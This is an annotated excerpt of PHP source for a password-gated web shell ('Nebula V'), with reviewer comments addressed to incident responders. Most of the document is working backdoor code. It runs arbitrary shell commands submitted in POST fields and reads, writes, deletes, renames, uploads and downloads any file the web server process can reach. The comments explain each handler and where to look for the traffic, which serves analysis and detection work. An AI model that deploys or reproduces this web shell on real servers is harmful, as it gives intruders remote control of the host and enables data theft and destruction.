'destroyed'])); }
// NOTE(review): the line above is the tail of a statement that starts before
// this excerpt; it is kept verbatim and not interpreted here.

// Purpose of this excerpt: request handler of a password-gated web shell.
// It contains a session/cookie gate, a dynamic-call helper (Core), tracking
// of the working directory, and a POST-driven API that runs shell commands
// and performs file operations with the privileges of the PHP process.
// $auth_cookie, $cwd_cookie, $auth_cookie_value, $auth_hash, $is_api_request,
// nb_set_cookie() and nb_clear_cookie() are defined outside this excerpt.

// Logout: ?logout destroys the session, clears both cookies and redirects.
if (isset($_GET['logout'])) {
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_destroy();
    }
    nb_clear_cookie($auth_cookie);
    nb_clear_cookie($cwd_cookie);
    // strtok(..., '?') keeps only the part of the URI before the query
    // string, so the redirect target no longer carries ?logout.
    header('Location: '.strtok($_SERVER['REQUEST_URI'], '?'));
    exit;
}

// Access gate: nothing below runs unless the session flag 'nebula_auth' is
// set. The flag is set when POST field 'k' hashes (SHA-256, no salt in the
// call) to $auth_hash. For responders, the session key name 'nebula_auth'
// and the POST field 'k' are fixed strings in this sample.
if (!isset($_SESSION['nebula_auth'])) {
    if (isset($_POST['k']) && hash('sha256', $_POST['k']) === $auth_hash) {
        $_SESSION['nebula_auth'] = true;
        $_SESSION['cwd'] = @getcwd() ?: '/';
        // Third argument is now + 30 days (86400 s * 30); presumably the
        // cookie expiry, confirm against nb_set_cookie().
        nb_set_cookie($auth_cookie, $auth_cookie_value, time() + 86400 * 30);
        // The value handed to the cookie helper is the server-side
        // working-directory path.
        nb_set_cookie($cwd_cookie, $_SESSION['cwd'], time() + 86400 * 30);
    } else {
        // Unauthenticated request: discard buffered output, then answer
        // 401 + JSON {"error":"AUTH_REQUIRED"} for API calls, or die() with
        // the string below for everything else.
        ob_end_clean();
        if ($is_api_request) {
            header('Content-Type: application/json');
            http_response_code(401);
            die(json_encode(['error' => 'AUTH_REQUIRED']));
        }
        // NOTE(review): in this excerpt the literal holds only a line break;
        // presumably markup was lost in extraction.
        die('
');
    }
}

// 5. Core - Safe dynamic function call
// NOTE(review): despite the label above, r() performs no validation of its
// arguments. It maps one-letter codes to PHP functions and calls them with
// whatever the caller passes. In this excerpt only r('x', ...) is used; the
// API handlers below call the file functions directly.
class Core {
    // $n: one-letter operation code; $a: arguments forwarded to the target.
    // Returns the callee's result, or false for an unknown/unavailable code.
    public function r($n, ...$a) {
        // 'x': run $a[0] through the system shell, stderr merged into stdout
        // (" 2>&1"). '@' suppresses PHP warnings from the call.
        if($n=='x') {
            return @shell_exec($a[0]." 2>&1");
        }
        // Short codes -> PHP function names, resolved at call time.
        $m = [
            'e'=>'exec',
            's'=>'scandir',
            'f'=>'file_get_contents',
            'w'=>'file_put_contents',
            'r'=>'rename',
            'u'=>'unlink',
            'c'=>'chmod'
        ];
        // function_exists() guards against a target that is not callable in
        // this PHP build/configuration.
        if(isset($m[$n]) && function_exists($m[$n])) {
            return @call_user_func_array($m[$n], $a);
        }
        return false;
    }
}
$sys = new Core();

// 6. CWD Handling - NULL-safe
// Falls back to '/' when getcwd() fails, and resets the session's cwd when
// it is missing, empty or no longer a directory.
$current_dir = @getcwd();
if($current_dir === false || $current_dir === null) {
    $current_dir = '/';
}
if(!isset($_SESSION['cwd']) || empty($_SESSION['cwd']) || !@is_dir($_SESSION['cwd'])) {
    $_SESSION['cwd'] = $current_dir;
}
nb_set_cookie($cwd_cookie, $_SESSION['cwd'], time() + 86400 * 30);
$cwd = $_SESSION['cwd']; // for JavaScript
@chdir($_SESSION['cwd']);

// 7. API Handler
// Dispatches on POST field 'req'. Values handled in this excerpt: cmd, list,
// read, save, del, rename, upload, ps, download. None of the handlers
// restricts paths to a base directory, so the reachable scope is whatever
// the PHP process user can read or write.
// Responder note: the operation name and its arguments travel in the POST
// body, which access logs typically do not record; request-body logging and
// process telemetry (shell children of the PHP worker) are the likelier
// places to observe this traffic.
if (isset($_POST['req'])) {
    if(ob_get_level() > 0) ob_clean();
    $req = $_POST['req'];
    // Every operation except 'download' answers with JSON.
    if($req !== 'download') header('Content-Type: application/json');

    // cmd: POST 'c' is executed as a shell command via Core::r('x', ...).
    if ($req === 'cmd') {
        $cmd = $_POST['c'];
        $out = '';
        // 'cd <dir>' is handled in PHP and stored in the session instead of
        // being sent to the shell; presumably because a directory change
        // made inside shell_exec() would not persist to the next request.
        if (preg_match('/^cd\s+(.*)$/', $cmd, $m)) {
            $target = trim($m[1]);
            if($target == '') $target = '/';
            if (@chdir($target)) {
                $_SESSION['cwd'] = @getcwd() ?: $target;
                nb_set_cookie($cwd_cookie, $_SESSION['cwd'], time() + 86400 * 30);
            } else {
                $out = "cd: error: $target";
            }
        } else {
            $out = $sys->r('x', $cmd);
        }
        echo json_encode(['out' => $out, 'cwd' => $_SESSION['cwd']]);
        exit;
    }

    // list: directory listing of POST 'path' (default: session cwd). The
    // requested path also becomes the new session cwd.
    if ($req === 'list') {
        $path = $_POST['path'] ?? $_SESSION['cwd'];
        if(empty($path)) $path = $_SESSION['cwd'];
        if(@is_dir($path)) {
            @chdir($path);
            $_SESSION['cwd'] = $path;
            nb_set_cookie($cwd_cookie, $_SESSION['cwd'], time() + 86400 * 30);
            $items = @scandir($path);
            $res = [];
            if($items) {
                foreach($items as $i) {
                    // Only '.' is skipped; '..' stays in the listing.
                    if($i == '.') continue;
                    $p = $path . DIRECTORY_SEPARATOR . $i;
                    $stat = @stat($p);
                    // n = name, d = is directory, s = size in KB (2 decimals)
                    // or '-' for directories, p = last four octal permission
                    // digits. The size suffix literal contains a line break
                    // as it appears in this excerpt.
                    $res[] = [
                        'n' => $i,
                        'd' => @is_dir($p),
                        's' => @is_dir($p) ? '-' : round(($stat['size']??0)/1024, 2).' 
KB',
                        'p' => substr(sprintf('%o', @fileperms($p)), -4),
                    ];
                }
            }
            echo json_encode(['files' => $res, 'cwd' => $path]);
        } else {
            echo json_encode(['error' => 'Path Error']);
        }
        exit;
    }

    // read: returns the file named in POST 'f', base64-encoded in JSON.
    if ($req === 'read') {
        $c = @file_get_contents($_POST['f']);
        echo json_encode(['data' => base64_encode($c)]);
        exit;
    }

    // save: writes base64-decoded POST 'c' to the path in POST 'f'; the
    // 'status' field carries file_put_contents()'s return value.
    if ($req === 'save') {
        echo json_encode(['status' => @file_put_contents($_POST['f'], base64_decode($_POST['c']))]);
        exit;
    }

    // del: unlink() on the path in POST 'f'.
    if ($req === 'del') {
        echo json_encode(['status' => @unlink($_POST['f'])]);
        exit;
    }

    // rename: rename() from POST 'old' to POST 'new'.
    if ($req === 'rename') {
        echo json_encode(['status' => @rename($_POST['old'], $_POST['new'])]);
        exit;
    }

    // upload: moves the uploaded 'file' into the session cwd under the
    // client-supplied file name, used as-is. No response body is written.
    if ($req === 'upload') {
        @move_uploaded_file($_FILES['file']['tmp_name'], $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $_FILES['file']['name']);
        exit;
    }

    // ps: returns the output of a fixed 'ps aux' shell command.
    if ($req === 'ps') {
        echo json_encode(['out' => @shell_exec('ps aux')]);
        exit;
    }

    // download: streams the file in POST 'f' as an attachment; the only
    // operation that does not send a JSON content type.
    if ($req === 'download') {
        $f = $_POST['f'];
        if(file_exists($f)){
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($f).'"');
            header('Content-Length: '.filesize($f));
            readfile($f);
        }
        exit;
    }

    // Unrecognised 'req' values end here with an empty body.
    exit;
}
if(ob_get_level() > 0) ob_clean();
// NOTE(review): text after the closing tag is emitted as page output; the
// markup that presumably surrounded it is not present in this excerpt.
?> Nebula V
NameSizePermsActions